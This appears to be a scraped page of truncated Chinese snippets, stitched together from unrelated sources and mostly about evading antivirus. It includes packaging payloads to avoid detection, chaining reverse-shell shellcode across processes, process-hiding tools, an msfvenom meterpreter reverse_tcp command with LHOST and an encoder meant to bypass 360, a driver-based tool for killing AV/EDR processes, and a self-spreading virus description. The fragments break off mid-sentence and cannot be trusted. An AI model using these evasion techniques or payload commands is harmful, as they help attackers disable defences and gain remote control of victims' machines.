pyinstaller目前已经被杀疯了,简单打包一个hello a="hello" print(a) #pyinstaller -F -w b.py -n HipsMain.exe 考虑Nuitka pip uninstall nuitka pip install nuitka== pip install nuitka==1.8.5 这里最新的1.8.5支持python3.11,因此将python环境切换到3.11 python -m nuitka --lto=no --onefile --stand...
顺着这个思路想了一下,能不能自己写一个进程,然后让自己写的这个程序作为一个桥梁使用,架起一座桥,使不同进程之间的DLL可以互相调用,这样一来,我们的反弹ShellCode就会变得更有趣,跳来跳去很赞,例如UserA.exe中存在一处ShellCode片段,UserB.exe中存在另一处,UserC.exe中也存在,最后都是通过我们的桥连接起来,...
X.c保护进程工具是一款能保护程序进程的小工具,它能有效避免你的程序被系统和杀软终止运行,有需要的就来IT猫扑下载吧! 进程保护工具介绍 进程保护,其主要作用就是防止外界程序对受保护的进程进行检测,如杀软查杀等。 X.c保护进程工具,能有效保护的进程、隐藏进程、保护内存、保护窗口,绝对实用。 X.c保护进程工具...
Metasploit 生成 C 过免杀 360 Metasploit Msf 相比大家都看过我直接写的笔记,大家也都会使用,这里也不一一细讲,直接上操作: 首先使用MSF的shikata_ga_nai构建x86一个shellcode: 代码语言:javascript 复制 msfvenom-p windows/meterpreter/reverse_tcpLHOST=192.168.2.12LPORT=9090-e x86/shikata_ga_nai-i8-f c>...
免杀基础总结---杀软常用查杀说明 一、参考文章 二、静态查杀# 文件复合特征码、内存特征码 主要扫描的特征段有:hash、文件名、函数名、敏感字符串、敏感api等等。(特征api的绕过) 对于内存免杀:可经过多重shellcode加解密绕过(没被杀软识别的算法),或者利用白加黑,让windows信任。
基于@ZeroMemoryEx的Terminator项目写的一个C#版,可通过URL远程或本地加载方式干掉杀软。 我们可以在源代码自己添加一些其他AV/EDR进程再重新编译,还可以集成到CobaltStrike插件中使用。 使用方法 远程URL时驱动程序会下载到C:\Windows\Temp,然后从那里加载。
这个是老流氓了。首先,找到c盘Program Files(x86)文件夹下面的MasterPDF文件夹,下面有一个pdfserver.exe的服务,把这个的后缀名改成.text后重启电脑就可以删除MasterPDF和MasterPDFData了 若找不到pdfserver.exe的话,可以使用everything这个软件去搜索,一下子就可以找到对应的位置了 ...
7.使用进程不断调用进程,使得在任务管理里无法结束病毒进程 8.不断搜索磁盘,只要发现未感染病毒的一律感染,病毒删除后1秒内再建 9.生成垃圾文件(DESTORY_感染_任意数字)5个于C盘下 10.附带删除文件函数(为防止危害,本函数默认不执行)本病毒到目前为止任何杀毒软件都无法将其查杀 本病毒单机默认...
2018.04 [freebuf] 基于TaskKill命令防杀的进程保护 2018.04 [freebuf] 利用.MF后缀文件猥琐绕过火绒杀毒测试 2018.04 [freebuf] 银行提款机惊现病毒:绕过杀毒软件达到牟利目的 2018.03 [4hou] 如何对抗史上杀伤力最强的勒索软件“Zenis” 2018.03 [pediy] [原创]实现关闭进程函数,杀掉pchunter 2018.03 [pediy] [原...
Ladon大型内网渗透扫描器,PowerShell、Cobalt Strike插件、内存加载、无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。网络资产探测32